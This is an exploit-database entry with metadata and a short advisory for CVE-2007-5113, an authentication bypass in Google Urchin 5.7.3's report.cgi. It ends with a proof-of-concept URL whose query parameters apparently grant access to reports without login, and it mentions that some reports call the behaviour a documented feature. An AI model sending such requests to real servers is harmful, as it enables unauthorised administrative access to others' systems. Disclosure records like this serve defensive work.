Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass
Author: MustLive
type: webapps
platform: cgi
port:
date_added: 2007-10-11
date_updated: 2014-01-02
verified: 1
codes: CVE-2007-5113;OSVDB-42334
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/26037/info
Google Urchin is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain administrative access to the vulnerable application. This may lead to other attacks.
Urchin 5.7.03 is vulnerable to this issue; other versions may also be affected.
NOTE: Further reports suggest that this is not a vulnerability, but a documented feature of the application.
http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4>ype=5